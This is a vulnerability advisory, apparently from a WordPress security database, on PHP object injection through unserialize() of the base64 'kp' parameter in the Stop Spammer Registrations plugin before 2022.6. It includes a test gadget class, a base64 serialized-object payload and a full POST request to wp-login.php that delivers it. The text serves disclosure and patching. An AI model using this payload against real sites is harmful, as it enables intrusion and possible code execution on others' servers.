The plugin passes base64 encoded user input to the unserialize() PHP function when CAPTCHA are used as second challenge, which could lead to PHP Object injection if a plugin installed on the blog has a suitable gadget chain
To simulate a gadget chain, put the following code in a plugin class Evil { public function __wakeup() : void { die(“Arbitrary deserialization”); } } On a page where the request is blocked and the second challenge is set to a CAPTCHA (such as reCAPTCHA), send dummy data, intercept it and change the kp parameter with the following payload: Tzo0OiJFdmlsIjowOnt9Ow== (which is the base64 of O:4:“Evil”:0:{};) POST /wp-login.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 176 Connection: close Upgrade-Insecure-Requests: 1 kn=6dc52e6b54&ss;_block=G&kp;=Tzo0OiJFdmlsIjowOnt9Ow%3D%3D&kr;=Allow+List+Email%3A+block%40email.com&ka;=block%40email.com&ke;=cwenf&km;=cc&recaptcha;=recaptcha&g-recaptcha-response;=
CPE | Name | Operator | Version |
---|---|---|---|
stop-spammer-registrations-plugin | lt | 2022.6 |